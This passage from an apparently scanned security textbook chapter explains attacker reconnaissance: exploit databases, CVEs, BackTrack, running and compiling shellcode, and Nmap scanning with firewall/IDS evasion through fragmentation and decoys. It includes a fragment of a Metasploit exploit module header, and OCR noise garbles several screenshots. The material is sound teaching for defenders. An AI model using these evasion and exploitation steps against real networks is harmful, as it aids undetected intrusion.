the hacker must understand and target those vulnerabilities present in order to exploit the system. 

Remember, at all times during indirect and direct scanning the attacker’s primary job is to find 
vulnerabilities to exploit against all systems that have access to the information that is being targeted. 
Also, remember that hackers have all of the time in the world, so many times their scanning tech- 
niques are going to be stealthy to prevent alerting anyone to his/her presence. 


Methodology 


When hackers are trying to gather research, they typically follow a loose methodology in order to 
exploit a system, as shown in Figure 9.1. 


B Identifying hosts: Obviously hackers are going to have to identify a range of Internet 
protocol (IP) subnets, whether internal to the network using private address ranges or exter- 
nal address ranges to identify hosts to target. Moreover, specific address ranges will be found 
from the indirect scanning techniques. In direct research scanning the hacker is trying to 
find vulnerabilities in that range. 
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Identifying Hosts 
Identifying Services 


Identifying Version 


Identifying Vulnerabilities 


Figure 9.1 Research methodology. 


m Identifying services: Once hosts are identified and possibly targeted, the hacker needs to 
determine what services are being run on these hosts to possibly exploit. For instance, if port 
80 is running, that’s common of a web server, or if port 22 its running that’s common of 
secure shell (SSH). Further, as the hacker identifies versions, he can identify if it’s a Windows 
system running a web server or Linux, which would identify that either internet information 
services (IIS) is running or Apache in most cases. 

B Identifying versions: Once these services have been identified the services have to be 
researched in order for versions to be identified in order to find vulnerabilities and to develop 
target shellcode for that exploit. Generally, many exploits occur because many information 
technology (IT) shops out there don't update or patch their systems. Even so, for the shops 
that do update, many times in an enterprise an environmental patch is released due to a 
vulnerability that has been publicly identified; however, there is a testing period before this 
update is rolled out in the enterprise due to the fact that this update could break a lot of 
clients/servers. Consequently, this is a prime time frame for an attacker to attack a network; 
this is one reason why many viruses spread so fast throughout a network, because sufficient 
patching has not occurred. 

B Identifying vulnerabilities: Once the service and version has been identified, the hacker 
then tries to tie this information back to the operating system version to target his exploit. 
Some vulnerabilities only work with certain versions of the application or operating system. 
Therefore, it’s important for him to hack this information. Also, two operating systems, such 
as Windows 2008 and Windows Vista, may be vulnerable but might have very different 
results from the same exploit. 


In conclusion, remember that the hacker is going to identify hosts that are on a network, he is 
going to identify the services running on those hosts, he's then going to identify the versions of 
those services on those hosts, and then he is going to try and find vulnerabilities that will allow 
him to get access into the system. 


Stealth 


If a hacker is more directly probing the network, and therefore there is a much higher probability 
of leaving artifacts that can be traced back to him and attributed to him. Therefore, the attacker is 
going to want to be as stealthy as possibly using the tools that he has at hand, or at least using IP 
addresses and sources that are not directly attributable to him. The hacker will definitely be using 
the options in these tools that minimize his digital footprint. 
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Offensive Security’s Exploit Database 


Once again it’s important for the attacker to find vulnerabilities associated with the operating 
system that he is targeting and the specific service version numbers that are running. The website 
http://www.exploit-db.com, which was created by Offensive Security, the makers of BackTrack, 
contains many exploits that are available. It’s used as a resource for hackers and penetration testers 
to create a one-stop shop to store and provide research for various exploits against varying soft- 
ware programs. Therefore, when researching exploits against a given operating system and version, 
hackers will want to query/use their Exploit Database as a resource to tailor their exploits. 


Local Exploits - Exploit Database 


«|» | | + Elnto:/www.exploit-db.com/local/ [20^ v 


EXPLOIT. | —— 
DATABASE / 


Archive Last Updated: 


Database Vulnerability Assessment & Security Scanning Tool. Free Trial! ww Sents 
Learn to to spot - and stop - them Download this free guide now! www iore con/Det 
1 ridiculously huge coupon a day. Get 50-90% off Baltimore's best! = 


Local Exploits 


Date ^ 


Description 
2010-10-25 
2010-10-22 
2010-10-19 L1 
2010-10-19 . 
2010-10-18 


2010-10-13 


2010-10-04 


$2«1«7«7« 7414 CORE te 


D 
+ 
+ 
+ 
+ 
200-10-18 $ 
*. 
s 
+ 
+ 


2010-10-04 


The search function allows you to search for various criteria such as description, a port, or an 
open source vulnerability database (OSVDB) or common vulnerabilities and exposures (CVEs) 
number assigned to a vulnerability. 


EXPLOIT 


-B.COM 


OSVDB: 
CVE (eg: 2010-2204): 


SEARCH 
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CVEs 


As mentioned just above, the Exploit Database website allows you to search for CVEs or through 
the OSVDB. CVEs are publicly known information security vulnerabilities or exposures. Basically, a 
hacker performing security research discovers a potential security vulnerability or exposure. The vul- 
nerability information and, if applicable, a proof of concept exploit, is then submitted to a candidate 
naming authority (CAN), where they research the vulnerability and assign it a number if it checks out. 
This number allows vulnerability databases to be linked together to compare security exploits, tools, 
scanners, and so on. One of the interesting things is that the CAN is made up of very well-known soft- 
ware vendors (normally the individuals issuing the patches) and computer emergency response teams 
(CERT) teams. Once these exploits are discovered they are then submitted to the various software 
vendors so they can develop patches to thwart these vulnerabilities. The CVEs are a way to coordinate 
between all of the security vendors out there. Every week Microsoft releases a patch on “Patch Tuesday” 
that resolves issues with a Microsoft programs. ‘These are based on known vulnerabilities that have been 
patched, and Microsoft issues them under a Microsoft (MS) number. Typically you will see “MS10- 
071 Security Update for Internet Explorer.” The 10 corresponds to the year and the -071 is the update 
number. Notice these updates span many CVEs and typically fix multiple vulnerabilities in one update. 


Security Bulletins 


The descriptions of the various vulnerabilities can be found on Microsoft's website. Here is an 
example link: 
http://www.microsoft.com/technet/security/bulletin/ms10-071.mspx 


ane Microsoft Security Bulletin MS10-071 - Critical: Cumulative Security Update for Internet Explorer (2360131) 


[e ess [zo] pmo microsoft.com/technet/security/bulletin/ms10-071.mspx 


vig 


TechNet ong | Ezy 
Technet Home TechCenters | Downloads | Techet Program | Subscriptions | Security Bulelns | Archive 
Sear for 


Microsoft | 
6S 
Microsoft Security Bulletin MS10-071 - Critical 
Cumulative Security Update for Internet Explorer (2360131) 


shed: October 12, 2010 | Updated: Orate 


Version: 1.1 


General Information 


ier pos ae so e cys oben aca Te S Oe support Me eys or Your 
Vulnerability Information 
© Severity Ratings and Vulnerability Identifiers 
© AutoComplete Information Disclosure Vulnerability - CVE-2010-0808 
© HTML Sanitization Vulnerability - CVE-2010-3243 
El HTML Sanitization Vulnerability - CVE-2010-3324 
El CSS Special Character Information Disclosure Vulnerability - CVE-2010-3325 
© Uninitialized Memory Corruption Vulnerability - CVE-2010-3326 
E Anchor Element Information Disclosure Vulnerability - CVE-2010-3327 
© Uninitialized Memory Corruption Vulnerability - CVE-2010-3328 
E Uninitialized Memory Corruption Vulnerability - CVE-2010-3329 
El Cross-Domain Information Disclosure Vulnerability - CVE-2010-3330 
© Uninitialized Memory Corruption Vulnerability - CVE-2010-3331 


As you can see in the example, this patch fixes all these publically available CVEs. 
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Zero Day Exploits 


‘The only way to obtain a CVE is to contact the people responsible for maintaing CVEs, or post 
the information to BugTraq or another analysis team. Many malicious hackers never submit their 
exploits and these exploits do not get assigned a number (as this is what security researchers and 
penetration testers do); these are known as “zero day” exploits, meaning that they are undisclosed. 
‘These are the most dangerous types of attacks to the network, and also the most difficult to defend 
from a network defender’s point of view, as developers have had zero opportunity to develop 
patches to their software. So, network defenders pretty much don't know what they are up against. 
The most successful and advanced hackers are the ones developing new exploits and discovering 
new vulnerabilities. Normally, when these zero day attacks are discovered, it is already too late. For 
more information visit http://cve.mitre.org/. 


000 CVE - CVE Numbering Authorities 
a | b | | + 8 http://cve.mitre.org/cve/cna.html [Reader ¢ | (Q- (5) 
CVE LIST COMPATIBLE PRODUCTS NEWS — OCTOBER 11, SEARCH 
p] 
À PF" Common Vulnerabilities and Exposures 
9,9 The Standard for Information Security Vulnerability Names 
= =: 


HOME > CVE LIST > CVE NUMBERING AUTHORITIES 
About CVE CVE Numbering Authorities [CveList O O| 


Terminology 
Documents Participating CNAs | Introduction to CVE-ID Reservation | Role and Requirements of CNAs De En UPS ee 
FAQs Vendor Liaisons | Researcher Responsibilities | Obtaining CVE-ID Numbers Reference Key/Maps 
CVE List 
About CVE Identifiers Participating CNAs ee Sources 
i 'ersions 

Obtain a CVE Identifier The organizations below are participating as CVE Numbering Authorities (CNAs) Search rine 
Search CVE as of June 2010: 
Search NVD Editor's Commentary 
CVE In Use Primary CNA Obtain a CVE Identifier 
CVE Adoption Editorial Policies 
CVE-Compatible Products * MITRE Corporation (cve@mitre.org) About CVE 
NVD for CVE Fix Identifiers 
Information jeer | 
More... Software Vendors ITEMS OF INTEREST 
News & Events 
Calendar * Apple (Apple issues only) MC 
Free Newsletter * Adobe Systems Incorporated (Adobe issues only) 
Community * Hewlett-Packard (H-P issues only) 
Fuge ie Bourd * Oracle (Oracle issues only) 
Contact Us * Cisco Systems, Inc. (Cisco issues only) 
Search the Site * Red Hat, Inc. (Linux issues only) 

* Debian GNU/Linux (Linux issues only) 

* FreeBSD (primarily FreeBSD issues only) 

* Ubuntu Linux (Linux issues only) 

* Microsoft Corporation (Microsoft issues only) 

* Silicon Graphics, Inc. (SGI issues only) 

Third-Party Coordinators 
* CERT/CC i 


* JPCERT/CC 


Security Focus 


Security Focus (www.securityfocus.com) is a cyber security web portal that allows hackers or com- 
y y M y 

puter security researchers to research exploits and vulnerabilities of various software programs. 
Security Focus also maintains BugTraq, which is a popular mailing list among cyber security 
professionals and features cyber security issues dealing with exploitation and penetration testing. 
Security Focus also allows the hacker to search based upon CVEs. 
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eoo SecurityFocus - a 
La le Jll hrp: /ww.securityfocus.com/ a Č] 


C»SecurityR 


Symantec Connect * 
A technical community for Symantec customers, end-users, developers, and.partners. 
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Linux Kernel 'video4linux' IOCTL and IP Multicast 'getsockopt' Adobe Shockwave Player 'dirapi.dll' CVE-2010-3655 
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Vulnerability Vulnerability 
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Pidgin 'libpurple' Multiple Denial of Service Vulnerabilities Multiple Vendor TLS Protocol Session Renegotiation 

2010-10-29 Security Vulnerability 

http://www.securityfocus.com/bid/44283 2010-10-29 


http://www.securityfocus.com/bid/36935 
Adobe Shockwave Player 'SetVertexArray()' CVE-2010-4090 
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2010-10-29 Remote Swing Vulnerability 
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» Search all vulnerabilities 
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One of the things hackers do is find vulnerabilities out in the wild that are available or they 
modify an existing proof of concept in order to further exploit it themselves. Therefore, in the next 
screenshot you see a Microsoft Windows print spooler service vulnerability, which is vulnerable 
even in most recent versions of Windows. If you go over to the exploit tab, it gives you an existing 
proof of concept that allows the hacker to exploit this vulnerability much like Exploit Database 
(www .exploit-db.com), which is run by Offensive Security. 


info | discussion l| exploit solution |I references 


Microsoft Windows Print Spooler Service Remote Code Execution Vulnerability 


Microsoft reports that this issue has seen limited in-the-wild exploits. 


A working commercial exploit is available through VUPEN Security - Exploit and PoCs Service. This explt 
publicly available or known to be circulating in the wild. 


The following exploit code is available. 


ə /data/vulnerabilities/exploits/43073.rb 


Notice that this proof of concept is a Ruby script, which exploits the MS10_061 vulnerability. 
Notice also that the shellcode shows that this is an exploit used as part of the Metasploit frame- 
work. Metasploit will be explained fully in Chapter 10. If a hacker designs an exploit, they will 
need to run it with its associated language and dependencies or compile it from the source, and it 
will work. 
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eoo http://downloads.securityfocus.com/vulnerabilities /exploits/43073.rb 

aje] laS http://downloads.securityfocus.com/vulnerabilities/exploits/43073. í 

## 0 
# $Id: msl10_061_spoolss.rb 10442 2010-09-23 02:15:402 jduck $ 

#8 

ae 


# This file is part of the Metasploit Pramework and may be subject to 

# redistribution and commercial restrictions. Please see the Metasploit 
# Pramework web site for more information on licensing and terms of use. 
# http://metasploit.com/framework/ 

we 


require 'msf/core"' 


class Metasploit3 « Msf::Exploit::Remote 
Rank * ExcellentRanking 


include Msf::Exploit::Remote::DCERPC 
include Msf::Exploit::Remote::SMB 
include Msf::Exploit::EXE 


def initialize(info = ()) 
super(update info(info, 


"Name" => 'Microsoft Print Spooler Service Impersonation 
Vulnerability', 5 
'Description' => ta{ A 
This module exploits the RPC service impersonation v 


vulnerability detailed in 


Shellcode 


Many of the vulnerabilities contain proof of concepts in the form of shellcode. Shellcode is a blan- 
ket term for a small amount code known as a “payload” to exploit a vulnerability, whether it be 
contained in scripts or higher-level language code that can be written in many different languages 
from Python, Perl, and Ruby, to C++. Typically, there are always two parts to shellcode: 


1. Exploit: This is what allows the hacker to break into the system. 
2. Payload: This is what allows the hacker to interact or perform actions on the system; it can 
be as simple as a command prompt, adding and injecting users, or a remote VNC shell. 


Running Shellcode 


If for some reason you find shellcode that you need to execute, all you have to do is find the lan- 
guage from which it runs (depending on if the code is reliable and coded correctly) and identify 
the extension. Note that the sudo command just makes sure your exploit runs at superuser privi- 
lege. To make sure everything typed is run as a superuser, you can do a sudosu, if you are using a 
Debian/Ubuntu based hacking platform. 

To execute shellcode: 


B sudo python ./shellcode.py «— Python uses .PY extension. 
B sudo perl ./shellcode.pl «— Perl uses a .PL extension. 
B sudo ruby ./shellcody.rb «— Ruby uses a .RB exetension. 


To compile shellcode: 


B sudo gcc shellcode —o outputfile «— C 
B sudo g++ shellcode —o outputfile < C++ 
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Note that in all of these examples you also have to make sure you have the right libraries installed. 
Sometimes many exploits use a library's specific set to call certain functions, classes, methods, and so 
on. The way to install these depends mostly on the code that is being used and varies greatly. 


BackTrack 


BackTrack is a free pentesting distribution of Linux more specifically based on the Ubuntu dis- 
tribution (a Debian fork), which contains many penetration testing and hacking tools packaged 
into one easy-to-use distribution. Therefore, downloading this package will eliminate the hassle 
of compiling a lot of the tools from different sources. BackTrack is available on a Live CD, a Live 
USB disk, and even is available as a virtual machine (VM). This will be the primary attack plat- 
form throughout the research and attack sections so go grab a copy. You can download BackTrack 
at http://www.backtrack-linux.org/. BackTrack 5 is the latest version as of May 2011. 


BackTrack Linux - Penetration Testing Distribution 


http: / /www.backtrack-linux.org / 


Welcome to backtrack-inux.org, home of the highest rated and acclaimed Linux security distribution to date. BackTrack isa 
Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native 
environment dedicated to hacking. Regardless if you're making BackTrack your em, booting from a 
LiveDVD, or using your favorite thumt , BackTrack has been customized down to every package, kernel configuration, 
script and patch solely for the purpose of the penetration tester. 


~ 
hack | track 
A 


BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information 
security field. BackTrack promotes a quick and easy way to find and update the largest database of security tools collection to- 
date. Our community of users range from skilled penetration testers in the information security field, goverment entities, 
information technology, security enthusiasts, and individuals new to the security community. Feedback from all industries and 
Skill levels allows us to truly develop a solution that is tailored towards everyone and far exceeds anything ever developed both 
commercially and freely available. The BackTrack Project is funded by Offens ecuri 


BackTrack is our default platform for hacking tools, as many of the tools used are inside. It is 
recommended that you grab the VM. However, many of these tools are also freely available for 
download from their respective websites. BackTrack 4 will be used in the examples in this chapter. 


BackTrack Tools 


Many of the programs installed in BackTrack are contained in /pentest/. Most can be accessed by 
just going to the Start menu (similar to Windows). Now, back to scanning. This chapter is primar- 
ily based on scanning techniques; however, much of this background information will be used 
throughout the book. 
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* Information Gathering 


|. Internet * 4 Network Mapping 
* Services ý < Vulnerability identi tio < OPEI 
| © Wine * «€ Web Application Analysis * « Cisco " 
| ^» Graphics * « Radio Network Analysis * © Fuzzers v 
*) Multimedia * © Penetration * © SMB Analysis » 
^ System * « Privilege Escalation * © SNMP Analysis d 
| ee Utilities * « Maintaining Access Lg 
| & KSnapshot * Digital Forensics E 

Actions *« Reverse Engineering » 
3m Settings * © Voice Over IP » 

* « Miscellaneous Ld 


- 


vaga X z 


Notice how many of the sections are broken up into the various areas of a hackers methodol- 
ogy and/or the varying techniques that the hackers try to use. 


BackTrack Scanning 


Many of the tools used to gather intelligence on our targets are located in BackTrack under cd 
/pentest/scanners; hence, look at the rest of the /pentest directory. In here you will see: 


drwxr-xr-x 2 root root 4.0K Jun 16 2009 5nmp 
drwxr-xr 6 root root 4.0K Jun 16 2009 netifera 
drwxr-xr-x 6 root root 4.0K Dec 14 2009 nikto 
drwxr-xr-x 6 root root 4.0K Jun 16 2009 nsat 
drwxr-xr-x 2 root root 4.0K Jun 16 2009 propecia 
drwxr-xr-x 2 root root 4.0K Jun 16 2009 sctpscan 


Windows Emulation in BackTrack 


Also, BackTrack 4 gives the user the ability to use some Windows executables; this is very useful 
for hackers. Hackers can use this ability to help them generate Windows payloads and executables 
to allow them to further retain their access, but most of all they can use Windows-based hacking 
tools as long as they don't have any dependencies outside that of Wine. 


Wine 


Wine (www.winehq.org) allows you to install and run applications in Linux just like you would in 
Windows itself. Wine is open source, freely available software. It is included as a part of BackTrack. 
Wine is especially important if the hacker comes across Windows-based shellcode that he wants 
to code into an executable while in Linux and/or the hacker needs to test some of his payloads/ 
exploits. The default location of Wine on BackTrack is /root/.wine. 
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Notice that in this directory we have drive C:. This is the default location to your Windows- 
based Wine. 
In order to compile C source under Wine: 


B sudo wingcc shellcode —o outputfile.exe «— C 
W sudo wineg++ shellcode —o outputfile.exe «— C++ 


A Table for Wine Commands 


Command Description 

wine Executes Windows binary in Wine emulator. 
winefile Windows-based GUI file browser. 

wincfg Configures Wine in GUI. 


Many times the hacker will be using Linux as his hacking platform of choice but needs a way to 
compile malware in a way that is executable on Windows victims if need be, and needs to be able 
to test it. 


Information Gathering and Vulnerability Assessment 
Using BackTrack 


By this point, the hacker has gained a lot of indirect recon, and now he has to really start assessing 
and finding vulnerabilities to exploit. Well, this can be a lot of information, so many penetration 
testers and hackers use tools to really document their findings. Hackers have to create detailed 
and efficient notes, as this helps them remember and focus on varying areas of attack. Sometimes 
is recommended just to create a mindmap using tools such as XMind (http://www.xmind.net/ 
downloads/). As part of a team of hackers or penetration testers, it's also important to share this 
information. Otherwise, only the hacker will really know what he has found and not his team. 
Another good tool for information sharing is the Dradis Framework (http://dradisframework.org/), 
which is included in BackTrack. Dradis is an open source framework for information sharing. 


Maltego 


Maltego (http://www.xmind.net/downloads/) is a tool that will gather and coordinate information 
that security researchers use to identify threats to their network. This tool is good for link analysis 
by coordinating the social engineering and indirect intelligence as well as to pair it with more direct 
intelligence scanning techniques. Hackers can use this to break down an organization and identify 
apparent threats and vulnerabilities to help pinpoint the attack. It will map groups of people, com- 
panies, their websites, domains, IP addresses, and even net blocks and much more to see how it is all 
connected. Therefore, using this tool, the hacker may find hidden links and new avenues of attack. 
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Notice how we can take a domain, map its net block, map its ports, and map the structure 
of the website. Especially when dealing with so many different leads, Maltego is a great tool for 
managing them and visually seeing how they intertwine. 


Nmap 


Nmap is one of the primary scanning tools used by hackers. It is a free scanning tool and one 
of the best. It is available on all platforms and you can download it at http://www.nmap.org/. 
Nmap stands for Network Mapper and is an open source tool used for gathering direct research 
on hosts, services, vulnerabilities, and version information. Consequently, the tool was designed 
for network exploration, security auditing, and mapping and exploring networks, and has been 
around since 1997. This tool is perfect for finding information on how to exploit a server. If for 
any reason you forget some of the Nmap commands just type: “nmap” or “man nmap” for some 
examples. 


Zenmap 


Nmap also comes with a GUI command tool known as Zenmap, which is very useful for manag- 
ing your scans and showing the varying options of Nmap without having to remember the varying 
switches. Zenmap gives some preconfigured profiles you can use that are specifically configured 
with various Nmap switches. 
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5 Zenmap 
Scan Jools Profile Help 


Command: |nmap -T4 -A -v -PE -PS22,25,80 -PA21,23,80,3389 192.168.22.133 


Hosts Services Nmap Output | Ports / Hosts | Topology | Host Details | Scans | 


os Host nmap -T4 -A -v -PE -PS22,25,80 -PA21,23,80,3389... v Details 
PCs ser) Interesting ports on 192.168.22.133: 
Not shown: 986 closed ports 
PORT STATE SERVICE VERSION 
53/tcp open domain Microsoft DNS 
88/tcp open tcpwrapped 
135/tcp open msrpc Microsoft Windows RPC 
139/tcp open netbios-ssn 
389/tcp open ldap 
464/tcp open tcpwrapped 
593/tcp open ncacn_http Microsoft Windows RPC 
over HTTP 1.0 
, 636/tcp open tcpwrapped 
4 1025/tcp open msrpc Microsoft Windows RPC 
1 1028/tcp open ncacn http Microsoft Windows RPC 
over HTTP 1.0 
1040/tcp open msrpc Microsoft Windows RPC 
1048/tcp open msrpc Microsoft Windows RPC 
3268/tcp open ldap 
3269/tcp open tcpwrapped 
MAC Address: 00:0C:29:B7:4A:E1 (VMware) 
Device type: general purpose 
Running: Microsoft windows XP|2003 
OS details: Microsoft windows XP Professional SP2 
or Windows Server 2003, Microsoft Windows XP SP2 or 


SP3 
Network Distance: 1 hop 

ICP Sequence Prediction: Difficulty=263 (Good luck!) 
IP ID Sequence Generation: Incremental 

Service Info; OS: windows 


Notice this scan gave back a list of ports, the state of the port, the service that is most likely 
running on the port, and lastly the version of the service being run. 


vy Host Status 
State: up 


Open ports: 14 “a 
Filtered ports: 0 

Closed ports: 986 

Scanned ports: 1000 


Up time: Not available e 
Last boot: Not available 


v Addresses 


IPv4: 
IPv6: 
MAC: 


192.168.22.133 
Not available 
00:0C:29:B7:4A;E1 


* Operating System 
Name: Microsoft Windows XP SP2 or SP3 


Accuracy: 10096 


> Ports used 


^ oS 


Zenmap also gives us information from the scan on the host status, such as how many open 
address, and what operating system is possibly being used. 


ports were on the IP address, MAC 


Class 
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Nmap Scanning for Subnet Ranges (Identifying Hosts) 


Host discovery: 


-sL: List scan—simply list targets to scan. 

-sP: Ping scan—go no further than determining if host is online. 
-PN: Treat all hosts as online—skip host discovery. 
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP to given ports. 


For using Nmap for host discovery, these options are the most important for identifying hosts. 
-sL gives us a list scan that basically just lists the targets it finds; this is good if you want a quick 
and dirty way to see what hosts are up. -sP uses the ping method, which is almost exactly like 
pinging a system via an ICMP echo request. -PN treats all hosts as online; hackers use this option 
because most computers have a type of firewall enabled. Essentially, Nmap runs certain finger- 
prints against services and ports and depending on the response can identify if a service is running 
on that port. Nmap allows the use of varying transport layer scanning techniques. The command 
for -PN: Treat all hosts as online—skip host discovery is as follows: 


root@bt:/pentest# nmap -v -PN 192.168.1.1-254 
or 


root@bt:/pentest# nmap -v -PN 192.168.1.0/24 «— Uses CIDR notation too! 


One of the first commands issued is to scan the varying subnets to get an idea of what hosts are 
up. If the hacker is within the network, this is a good way to see how vulnerable you are. 


"Host 192.168.22.131 is up (0.00084s latency). 
Interesting ports on 192.168.22.131: 

Not shown: 990 closed ports 

PORT STATE SERVICE 
22/tcpopen ssh 
80/tcpopen http 
110/tcp open pop3 
143/tcp openimap 
993/tcp openimaps 
995/tcp open pop3s 

8001/tcpopen unknown 

8002/tcpopen teradataordbms 
8080/tcpopen http-proxy 

9000/tcpopen cslistener 

MAC Address: 00:0C:29:44:48:D9 (VMware) 


Host 192.168.22.254 is up (0.00019s latency). 
All 1000 scanned ports on 192.168.22.254 are filtered 
MAC Address: 00:50:56:F9:81:8E (VMware) 


Read data files from: /usr/share/nmap 
Nmap done: 254 IP addresses (5 hosts up) scanned in 26.14 seconds 
Raw packets sent: 7102 (311.484KB) | Revd: 5301 (216.100KB)" 


Here we can see that the entire network range was scanned and it identified that five hosts were up 
and that it took only 26.14 seconds to scan for 254 hosts. Remember, scanning over the Internet 
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and much bigger networks could take a much longer time. Note this scan shows the multiple ports 
that are open and what services are possibly running on each port. Remember port ranges span 
from 1—65,535, and just because port 80 is supposed to be reserved for a web server doesn't mean 
that service has to running on that port. Services can run on pretty much any port they choose. 
This is important for the command and control channels hackers use in their attack. A command 
and control channel is basically what the hacker uses to control access to the server. Also, while 
you can sometimes notice what services are running sometimes, you may not be able to detect 
what kind of operating system is being run and what patch level it is at. However, from the service 
being run itself hackers can easily tell what type of server it is. For instance, Linux-based serv- 
ers have Linux-based ports such as 20 SSH; Windows servers on the other hand have ports like 
135—139, 445 or 1025, which infer that they are Windows-based servers. 

One of the best ways to prevent hackers from noticing some critical services that you have on 
your network is to use unusually high port numbers. Most scanning tools themselves only default 
scan the first 10,000 ports, as most ports after those are never used. Therefore, when hardening a 
server that needs remote access such as SSH, use a port such as 39,329. Most scans out there will 
never find that port, or much less spend the entire time scanning all 65,535 ports. Keep in mind, 
however, that if you change your web port to a non standard port that people will not be able to 
get to your site without knowledge of the port number. 


Nmap Scanning for Subnet Ranges (Identifying Services) 


Once we have identified the hosts in the range that we want to target, then we have to try and 
identify the services and type of operating system that is being run specifically and what version 
those services are running in order to find ways to exploit their vulnerabilities. Therefore, it's 
important to do operating system detection. In order to do operating system detection, add an -O 
switch to your Nmap scan. 

Also, hackers have the ability to manipulate the TCP handshake by using multiple options. The 
Nmap command with the -sS switch is a TCP SYN scan also known as a TCP “half open" scan, as 
in this type of scan the hacker sends a SYN packet to the victim, and if the victim port is open the 
victim will then send a SYN + ACK as part of the three-way handshake. Otherwise the victim will 
send an RST or nothing at all. However, the -sT option allows the full TCP handshake sequence as 
part of the scan. Lastly, the -sA command will send TCP flags with the ACK flagset. This command is 
primarily designed to test for firewall filtering rules or access control list, because ifan ACK is sent and 
a RST comes back, then the hacker knows that the access rules at least let him go through a firewall. 

Examples of how nmap can be used in this situation include: 


B rootbt:/pentest£ nmap -v -sS -O 192.168.22.132 «— Half-way handshake 
B root@bt:/pentest# nmap -v -sT -O 192.168.22.132 < Three-way handshake 
B root@bt:/pentest# nmap -v -sA -O 192.168.22.132 < ACK handshake 


Output: 


Interesting ports on 192.168.22.132: 
Not shown: 984 closed ports 

PORT STATE SERVICE 
53/tcpopen domain 
88/tcpopen kerberos-sec 
135/tcp openmsrpc 
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139/tcp opennetbios-ssn 

389/tcp openldap 

445/tcp openmicrosoft-ds 

464/tcp open kpasswd5 

593/tcp open http-rpc-epmap 

636/tcp openldapssl 

1025/tcpopen NFS-or-IIS 

1026/tcpopen LSA-or-nterm 

1028/tcpopen unknown 

1038/tcpopen unknown 

1049/tcpopen unknown 

3268/tcpopen globalcatLDAP 
3269/tcpopen globalcatLDAPssl 

MAC Address: 00:0C:29:C7:A7:B6 

Device type: general purpose 

Running: Microsoft Windows XP|2003 

OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003, 
Microsoft Windows XP SP2 or SP3 
Network Distance: 1 hop 

TCP Sequence Prediction: Difficulty-262 (Good luck!) 
IP ID Sequence Generation: Incremental 


Note that this option gives us a list of ports and associated services. From here, Nmap identified 
Microsoft Windows XP SP2 or Windows 2K3; however, Nmap is not exactly sure which operat- 
ing system is being used. This is important because some exploits might not work unless they are 
used against the exact OS with a certain service pack level. 


Nmap Scanning for Subnet Ranges (Identifying Versions) 


Notice in this example the -sV command gives a good idea as to what service is being run on the 
port and what version it could possibly be. 'This is very important from a hacker perspective so he 
can identify well-known exploitable services that might be running on different ports. 

The command for “-sV: Probe open ports to determine service/version info" is as follows: 


B rootbt:/pentest nmap -v -sV 192.168.22.132 


PORT STATE SERVICE VERSION 

53/tcpopen domain Microsoft DNS 

88/tcpopen kerberos-sec Microsoft Windows kerberos-sec 
135/tcp openmsrpc Microsoft Windows RPC 

139/tcp opennetbios-ssn 

389/tcp openldap 

445/tcp openmicrosoft-ds Microsoft Windows 2003 microsoft-ds 
464/tcp open kpasswd5? 

593/tcp openncacn http Microsoft Windows RPC over HTTP 1.0 
636/tcp opentcpwrapped 

1025/tcpopen msrpc Microsoft Windows RPC 

1026/tcpopen msrpc Microsoft Windows RPC 

1028/tcpopen ncacn http Microsoft Windows RPC over HTTP 1.0 
1038/tcpopen msrpc Microsoft Windows RPC 

1049/tcpopen msrpc Microsoft Windows RPC 


I 
I 
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Nmap Scanning Firewall/IDS Evasion 


Nmap is a very powerful scanning tool for fingerprinting system services and version informa- 
tion, however it can also be a highly noisy program and can easily be picked up by firewalls and 
intrusion detection systems (IDSs) due to the amount of abnormal traffic being sent out over the 
network. Therefore, the hacker has methods at his disposal to prevent being detected. 

By using the -f command it will fragment the MTU of the IP header into very small data 
chunks where firewalls and IDS are less likely to be able to put the stream together and be able 
to detect on that stream, which fools the security systems into thinking it's normal traffic. The 
MTU is the maximum transmission size, and this fragmentation method works because the host 
only sends very small packets that the firewall or IDS is unable to detect because the other host is 
responsible for reassembly of the packets on the network layer and the firewall or IDS just reads 
these packets; it doesnt normally process them together. However, many new firewalls and IDSs 
such as Snort actually assemble these strings together in order to process alerts better as part of 
a preprocessor. 

Firewall and Intrusion Detection System Evasion: 


B -f--mtu<val>: fragment packets (optionally w/given MTU) 
B -D <decoyl,decoy2[,ME],...>: Cloak a scan with decoys 


This is an example of a nmap command that will allow an attacker to evade some detection 
mechanisms. 


B root@bt:/pentest# nmap -v -sV -O -f --mtu 16 192.168.22.132 


etho: Capturing - Wireshark 


"TVITTUIUI-ELEITJIOIESLAES- 


[Time . | Source | Destination | Protocol | Info 


2. 22. 2. 22.132 TCP 5307 lomain [RST 


3174 58.881307 192. 168. 22. 130 192. 168.22. 132 Fragmented IP protocol (proto 
3175 58.881528 192. 168.22. 130 192. 168. 22. 132 Fragmented IP protocol (proto 
3176 58.881639 192. 168. 22.130 192. 168. 22. 132 53075 > domain [] Seq=1762537 
3 3 ] 3 F 


3178 58.906527 192. 168.22. 130 192. 168. 22. 132 Fragmented IP protocol (proto 
3179 58.906746 192. 168.22. 130 192. 168. 22. 132 Fragmented IP protocol (proto 


2102 co 021776 IM 160 N 


> Frame 1 (42 bytes on wire, 42 bytes captured) 
* Ethernet II, Si : : 1), Dst: Broadcast (ff:ff 
> Address Resolution Protocol (request) 


ges ff ff ff ff ff cl 08 06 00 0l 
0010 (08 OO 06 O4 OO 01 OO Oc 29 93 25 cl cO a8 16 82 
oo20 ff ff ff ff ff ff co a8 16 84 


Ethernet (eth), 14 bytes Packets: 3341 Displayed: 3341 Marked: 0 1 Profile: Default 


Notice that this option generated over 3000 packets just for a simple scan for one single host with 
the fragmentation set. This is very noisy from a packet standpoint, and could be easily detected 
with an IDS system set up appropriately. When is it appropriate for a host on a network to send 
over 3000 packets in less than a second? 
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Nmap Scanning Decoys 


-S allows for the use of IP address spoofing however, it is extremely important to note you cannot 
spoof another address and expect to receive a response from the victim. Therefore, it's not as useful 
to the attacker unless he wants to really fill up logs or deflect the attention to another individual 
or target. That's where the -D option is helpful because it allows you to cloak a scan using decoys. 
What that basically means is that the hacker has the ability to cloak his IP address among other 
decoy IP addresses. Basically you designate a pool of decoys to use and then designate the host 
that you want to scan against. 
Here is an example command: 


B root@bt:/pentest# nmap -v -sS -D 192.168.1.3, 192.68.1.43 192.168.22.132 
Decoy addresses: 


B 192.168.1.3 
W 192.68.1.43 


Scanning address: 
W 192.168.22.132 


This command sends three packets per scan mixed in with two decoy addresses. This equates to 
